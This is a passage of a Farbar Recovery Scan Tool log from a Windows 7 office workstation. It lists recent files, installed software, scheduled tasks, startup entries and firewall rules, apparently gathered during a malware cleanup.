2016-11-15 13:02 - 18068701 _____ C:\Users\cjerald\AppData\Local\census.cache 2016-11-02 10:51 - 2016-11-15 10:31 - 00882323 _____ C:\Users\cjerald\AppData\Local\ars.cache 2016-11-02 10:50 - 2016-11-15 02:28 - 00000010 _____ C:\Users\cjerald\AppData\Local\sponge.last.runtime.cache 2016-11-02 10:39 - 2016-11-02 10:39 - 00000000 ____D C:\Windows\Trend Micro 2016-11-02 10:39 - 2016-11-02 10:39 - 00000000 ____D C:\ProgramData\Trend Micro 2016-11-02 10:38 - 2016-11-02 10:38 - 02527376 _____ (Trend Micro Inc.) C:\Users\cjerald\Downloads\HousecallLauncher64.exe 2016-11-02 10:38 - 2016-11-02 10:38 - 00000036 _____ C:\Users\cjerald\AppData\Local\housecall.guid.cache 2016-11-02 10:32 - 2016-11-18 19:25 - 00181160 _____ C:\Windows\ntbtlog.txt 2016-11-02 10:25 - 2016-11-02 10:25 - 00144778 _____ C:\Users\cjerald\Downloads\cc_20161102_112336.reg 2016-11-02 10:18 - 2016-11-02 10:18 - 00002784 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC 2016-11-02 10:18 - 2016-11-02 10:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner 2016-11-02 10:18 - 2016-11-02 10:18 - 00000000 ____D C:\Program Files\CCleaner 2016-11-02 09:55 - 2016-11-02 09:55 - 00000000 ____D C:\Users\cjerald\AppData\Roaming\AVAST Software 2016-11-02 09:54 - 2016-11-02 09:54 - 00391496 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe 2016-11-02 09:54 - 2016-11-02 09:54 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software 2016-11-02 09:54 - 2016-11-02 09:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software 2016-11-02 09:53 - 2016-11-02 10:31 - 00000000 ____D C:\ProgramData\AVAST Software 2016-11-02 09:53 - 2016-11-02 09:59 - 00000000 ____D C:\Program Files\AVAST Software 2016-11-02 09:53 - 2016-11-02 09:53 - 06253640 _____ (AVAST Software) C:\Users\cjerald\Downloads\avast_free_antivirus_setup_online_cnet_1.exe 2016-11-02 09:53 - 2016-11-02 09:53 - 00053208 _____ (AVAST Software) C:\Windows\avastSS.scr 2016-11-01 12:21 - 2016-11-01 12:21 - 05658651 ____R (Swearware) C:\Users\cjerald\Downloads\ComboFix.exe 2016-11-01 11:53 - 2016-11-19 15:53 - 00000000 ____D C:\Program Files (x86)\Slimjet 2016-11-01 11:53 - 2016-11-01 11:53 - 00000000 ____D C:\Users\cjerald\AppData\Local\Slimjet 2016-11-01 11:53 - 2016-11-01 11:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashPeak Slimjet ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-12-01 04:40 - 2009-07-13 23:45 - 00022096 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2016-12-01 04:40 - 2009-07-13 23:45 - 00022096 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2016-12-01 04:36 - 2015-06-05 11:31 - 00000670 _____ C:\Windows\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job 2016-12-01 04:36 - 2014-02-03 15:59 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2016-12-01 04:30 - 2015-02-24 13:15 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2016-12-01 04:26 - 2014-02-03 15:59 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2016-12-01 04:25 - 2013-12-17 12:00 - 00000112 _____ C:\Windows\system32\config\netlogon.ftl 2016-12-01 04:16 - 2014-02-03 15:59 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job 2016-12-01 03:46 - 2013-12-17 09:58 - 00000000 ____D C:\ProgramData\LogMeIn 2016-12-01 03:43 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2016-12-01 03:42 - 2013-12-12 13:16 - 00000000 ____D C:\ProgramData\NVIDIA 2016-12-01 03:25 - 2009-07-13 22:20 - 00000000 ___HD C:\Windows\system32\GroupPolicy 2016-12-01 02:43 - 2014-03-11 14:03 - 00000574 _____ C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job 2016-12-01 02:19 - 2013-12-17 15:29 - 00003914 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{6EA3AC3A-126A-4AFB-8EF2-29F1B0AD6D53} 2016-11-30 04:42 - 2013-12-17 12:02 - 00000000 ____D C:\Users\cjerald 2016-11-23 05:39 - 2009-07-14 00:08 - 00032580 _____ C:\Windows\Tasks\SCHEDLGU.TXT 2016-11-21 12:26 - 2009-07-14 00:32 - 00000000 ____D C:\Windows\system32\FxsTmp 2016-11-21 02:03 - 2015-05-05 11:13 - 00000000 ____D C:\Users\cjerald\AppData\LocalLow\Temp 2016-11-19 20:23 - 2015-06-05 11:31 - 00003690 _____ C:\Windows\System32\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148 2016-11-19 20:23 - 2014-03-11 14:03 - 00003594 _____ C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148 2016-11-19 16:14 - 2015-02-24 13:15 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys 2016-11-18 19:16 - 2009-07-14 00:37 - 00000000 ____D C:\Windows\DigitalLocker 2016-11-18 15:39 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\TAPI 2016-11-18 15:36 - 2015-04-16 07:28 - 00000000 ____D C:\Windows\system32\appraiser 2016-11-18 15:36 - 2014-05-06 18:09 - 00000000 ___SD C:\Windows\system32\CompatTel 2016-11-18 15:21 - 2009-07-14 00:13 - 00785942 _____ C:\Windows\system32\PerfStringBackup.INI 2016-11-18 15:21 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf 2016-11-17 10:37 - 2014-07-24 12:50 - 00000000 ____D C:\Users\cjerald\AppData\Local\ElevatedDiagnostics 2016-11-16 22:13 - 2015-11-25 13:59 - 00000000 ____D C:\Program Files (x86)\Backblaze 2016-11-16 21:18 - 2013-12-17 12:11 - 00000000 ____D C:\Users\clayton 2016-11-16 14:14 - 2014-10-19 10:08 - 00000000 ____D C:\Users\cjerald\AppData\Local\CrashDumps 2016-11-16 10:52 - 2014-02-03 15:59 - 00000000 ____D C:\Users\cjerald\AppData\Local\Google 2016-11-16 08:05 - 2013-12-17 15:38 - 00000000 ____D C:\ProgramData\Oracle 2016-11-16 07:53 - 2013-12-17 15:38 - 00269888 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe 2016-11-16 02:34 - 2013-12-17 12:26 - 00177752 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT64x86.SYS 2016-11-16 02:34 - 2013-12-17 12:26 - 00008222 _____ C:\Windows\system32\Drivers\SYMEVENT64x86.CAT 2016-11-16 02:34 - 2013-12-17 12:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Symantec Endpoint Protection 2016-11-16 02:32 - 2013-12-17 12:24 - 00577392 _____ (Symantec Corporation) C:\Windows\system32\SymVPN.dll 2016-11-16 02:32 - 2013-12-17 12:24 - 00421232 _____ (Symantec Corporation) C:\Windows\SysWOW64\SymVPN.dll 2016-11-16 02:32 - 2013-12-17 12:24 - 00158576 _____ (Symantec Corporation) C:\Windows\system32\FwsVpn.dll 2016-11-16 02:32 - 2013-12-17 12:24 - 00155472 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SysPlant.sys 2016-11-16 02:32 - 2013-12-17 12:24 - 00136560 _____ (Symantec Corporation) C:\Windows\SysWOW64\FwsVpn.dll 2016-11-16 02:32 - 2013-12-17 12:24 - 00045088 _____ (Symantec Corporation) C:\Windows\system32\Drivers\WGX64.SYS 2016-11-14 20:42 - 2014-02-03 16:00 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-11-14 19:07 - 2015-09-18 09:44 - 00000000 ____D C:\Qoobox 2016-11-14 19:03 - 2009-07-13 21:34 - 00000215 _____ C:\Windows\system.ini 2016-11-14 18:09 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\Registration 2016-11-14 17:47 - 2009-07-14 00:09 - 00000000 ____D C:\Windows\System32\Tasks\WPD 2016-11-14 13:00 - 2013-12-12 12:40 - 00000000 ____D C:\Program Files\Intel 2016-11-10 12:56 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\rescache 2016-11-10 07:57 - 2009-07-13 23:45 - 00402552 _____ C:\Windows\system32\FNTCACHE.DAT 2016-11-09 17:30 - 2013-12-12 13:52 - 00000000 ____D C:\Windows\system32\MRT 2016-11-09 17:08 - 2013-12-12 13:52 - 141011376 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2016-11-08 20:33 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\PLA 2016-11-08 20:12 - 2013-12-12 13:03 - 00000000 ____D C:\Drivers & Utilities 2016-11-08 15:54 - 2013-12-17 09:58 - 00001024 _____ C:\.rnd 2016-11-02 10:22 - 2013-12-11 21:00 - 00000000 ____D C:\Windows\Panther 2016-11-02 09:54 - 2016-04-13 13:28 - 00000000 ____D C:\Program Files\Common Files\AV 2016-11-01 11:32 - 2015-02-24 13:15 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware 2016-11-01 10:23 - 2015-02-24 13:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware ==================== Files in the root of some directories ======= 2016-11-02 10:51 - 2016-11-15 10:31 - 0882323 _____ () C:\Users\cjerald\AppData\Local\ars.cache 2016-11-02 10:51 - 2016-11-15 13:02 - 18068701 _____ () C:\Users\cjerald\AppData\Local\census.cache 2016-11-02 10:38 - 2016-11-02 10:38 - 0000036 _____ () C:\Users\cjerald\AppData\Local\housecall.guid.cache 2016-11-02 10:50 - 2016-11-15 02:28 - 0000010 _____ () C:\Users\cjerald\AppData\Local\sponge.last.runtime.cache 2014-03-12 18:30 - 2014-03-12 18:30 - 0000095 _____ () C:\ProgramData\SAH_Install.ini ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-11-24 00:52 ==================== End of FRST.txt ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-11-2016 Ran by cjerald (01-12-2016 04:42:16) Running from \\SPARTA\RedirectedFolders\cjerald\Desktop Windows 7 Professional Service Pack 1 (X64) (2013-12-12 14:41:32) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-343821754-1919214937-3281495952-500 - Administrator - Disabled) Guest (S-1-5-21-343821754-1919214937-3281495952-501 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Symantec Endpoint Protection (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Symantec Endpoint Protection (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Adobe Acrobat X Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000005}) (Version: 10.1.8 - Adobe Systems) Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated) Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.162 - Adobe Systems Incorporated) Backblaze (HKLM-x32\...\Backblaze) (Version: - Backblaze, Inc) Canon MF Toolbox 4.9.1.1.mf09 (HKLM-x32\...\{6767DFEE-8909-453A-B553-C7693912B2EB}) (Version: 3.2.0 - Canon) Canon MF8300 Series (HKLM\...\{E47364AA-6B5E-45a2-B94F-BC5D9D6A0338}) (Version: - ) CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform) Citrix Online Launcher (HKLM-x32\...\{DB014C85-A264-4BCA-A66F-6DD1FCF8EC36}) (Version: 1.0.335 - Citrix) CYMA IV Accounting Workstation (HKLM-x32\...\{6F43D45B-4C72-4BB8-9601-BFE282765A38}) (Version: 14.3.0 - CYMA Systems Inc.) CYMA IV Accounting Workstation (x32 Version: 13.0.0 - CYMA Systems Inc.) Hidden CYMA IV Accounting Workstation (x32 Version: 14.0.0 - CYMA Systems Inc.) Hidden DiskCheckup v3.4 (HKLM-x32\...\DiskCheckup_is1) (Version: 3.4.1002 - PassMark Software) FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 12.0.6.0 - FlashPeak Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.0.0.1019 - Citrix Online, a division of Citrix Systems, Inc.) GoToAssist Customer 2.7.0.1092 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.7.0.1092 - Citrix Online) GoToMeeting 7.27.0.5922 (HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\GoToMeeting) (Version: 7.27.0.5922 - CitrixOnline) Intel Security True Key (HKLM\...\TrueKey) (Version: 4.0.157.1 - Intel Security) Intel(R) Network Connections 21.1.30.0 (HKLM\...\PROSetDX) (Version: 21.1.30.0 - Intel) Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation) LogMeIn (HKLM-x32\...\{F099EA75-A298-4A13-93CB-D2446436B137}) (Version: 4.1.3888 - LogMeIn, Inc.) Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) marvell 91xx driver (HKLM-x32\...\MagniDriver) (Version: 1.0.0.1047 - Marvell) Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation) Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) MyDefrag v4.3.1 (HKLM\...\MyDefrag v4.3.1_is1) (Version: 4.0.0.0 - J.C. Kessels) NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation) NVIDIA 3D Vision Driver 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 341.81 - NVIDIA Corporation) NVIDIA GeForce Experience 2.2.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.2.2 - NVIDIA Corporation) NVIDIA Graphics Driver 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.81 - NVIDIA Corporation) NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation) NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation) Pervasive PSQL v10 SP3 Workgroup (32-bit) (HKLM-x32\...\Pervasive PSQL v10 SP3 Workgroup (32-bit)) (Version: 10.30.024 - Pervasive Software) Pervasive PSQL v10 SP3 Workgroup (32-bit) (x32 Version: 10.30.024 - Pervasive Software) Hidden Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6257 - Realtek Semiconductor Corp.) Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.26.0 - Renesas Electronics Corporation) Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.26.0 - Renesas Electronics Corporation) Hidden Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group) Roadkil's CommTest Version 1.3 (HKLM-x32\...\{DB6A986B-CCF7-4041-81ED-80EB2C106CC5}_is1) (Version: - Roadkil.Net) Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft) SHIELD Streaming (Version: 4.0.1000 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 17.12.8 - NVIDIA Corporation) Hidden Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.6 - Sophos Limited) Symantec Endpoint Protection (HKLM\...\{827E3EA6-85D1-4413-96D8-24B0F9B49967}) (Version: 12.1.4112.4156 - Symantec Corporation) WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.5800 - Broadcom Corporation) Windows Small Business Server 2008 ClientAgent (HKLM\...\{E4FF4DF1-F99C-49AC-B398-BE0887432846}) (Version: 6.0.5601.0 - Microsoft Corporation) Windows Small Business Server 2008 Desktop Links Gadget (HKLM\...\{F5E5D7CA-0F94-41A3-8106-66473C2F3728}) (Version: 6.0.5601.0 - Microsoft Corporation) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5636\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {00CE36DB-6A59-4EDB-9CE8-3D9F4F58544F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-09-26] (Adobe Systems Incorporated) Task: {67103020-3F8F-4EDA-8E62-70B7D54ACB04} - System32\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148 => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5922\g2mupload.exe [2016-11-19] (Citrix Online, a division of Citrix Systems, Inc.) Task: {748E8811-5D55-4A95-920A-A2AB97876CA2} - System32\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148 => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5922\g2mupdate.exe [2016-11-19] (Citrix Online, a division of Citrix Systems, Inc.) Task: {791D2EF3-CC5F-456B-BA1D-73D0FF09CA20} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.) Task: {7C218579-20A7-4E64-865C-4259D7EE197E} - System32\Tasks\{F111F422-023F-4E16-B5C9-51B124B93F42} => C:\Program Files (x86)\Canon\MF Toolbox Ver4.9\MFTBOX.exe [2009-06-22] (CANON INC.) Task: {7F116B38-B214-4CB7-8D57-75B6AD0DA29B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd) Task: {90796BBB-1718-4BBD-90E0-BD8974C45185} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2016-03-01] (McAfee, Inc.) Task: {CAA82495-2800-4590-9E6F-20FBD34E3713} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-11-02] (AVAST Software) Task: {CAD262DC-4394-4840-AF0D-12204F01BD2F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.) Task: {F7F3F4E1-31FF-4508-ADC1-D18EE21605A9} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-10-21] (Adobe Systems Incorporated) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5922\g2mupdate.exe Task: C:\Windows\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5922\g2mupload.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) Shortcut: C:\Users\cjerald\AppData\Local\322148\4c5510.lnk -> C:\Users\cjerald\AppData\Local\322148\83934e.bat (No File) ==================== Loaded Modules (Whitelisted) ============== 2015-11-25 14:00 - 2016-11-16 22:12 - 00356008 _____ () C:\Program Files (x86)\Backblaze\bzserv.exe 2013-12-12 13:16 - 2015-08-17 19:07 - 00115376 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2015-11-25 14:00 - 2016-11-16 22:12 - 00596648 _____ () C:\Program Files (x86)\Backblaze\bzbui.exe ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2016-11-01 12:29 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Control Panel\Desktop\\Wallpaper -> C:\Users\cjerald\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.0.105 - 192.168.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == MSCONFIG\Services: AdobeARMservice => 2 MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3 MSCONFIG\Services: btwdins => 2 MSCONFIG\Services: GoToAssist => 3 MSCONFIG\Services: gupdate => 2 MSCONFIG\Services: gupdatem => 3 MSCONFIG\Services: Intel(R) PROSet Monitoring Service => 2 MSCONFIG\Services: LMIGuardianSvc => 2 MSCONFIG\Services: LMIMaint => 2 MSCONFIG\Services: LogMeIn => 2 MSCONFIG\Services: UNS => 2 MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\Windows\pss\Bluetooth.lnk.CommonStartup MSCONFIG\startupreg: Acrobat Assistant 8.0 => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe" MSCONFIG\startupreg: Adobe Acrobat Speed Launcher => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe" MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" MSCONFIG\startupreg: LogMeIn GUI => "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [SPPSVC-In-TCP-NoScope] => %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP] => %SystemRoot%\system32\sppsvc.exe FirewallRules: [TCP Query User{A79DD511-2162-4E17-84DC-E427C7089D6F}C:\program files (x86)\google\chrome\application\chrome.exe] => C:\program files (x86)\google\chrome\application\chrome.exe FirewallRules: [UDP Query User{927A5DA9-3912-4C00-993F-5E7E7D2E378C}C:\program files (x86)\google\chrome\application\chrome.exe] => C:\program files (x86)\google\chrome\application\chrome.exe FirewallRules: [{C91EBF51-63D3-487A-A5C4-4AA7ECAA3F63}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{12BE54D9-D811-4084-B305-9C0CDDE91A9E}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe FirewallRules: [{0221E735-4049-4942-B8A0-C1023385A22A}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe FirewallRules: [{EFC291DC-7AA8-46EF-9D8C-86542FBA9448}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe FirewallRules: [{FA416475-07C3-4377-AD2B-158E3ECF4CC9}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe ==================== Restore Points ========================= 18-11-2016 15:31:55 Malwarebytes Anti-Rootkit Restore Point 21-11-2016 02:01:12 Restore Point Created by FRST 29-11-2016 00:00:01 Scheduled Checkpoint ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (12/01/2016 03:43:36 AM) (Source: WinMgmt) 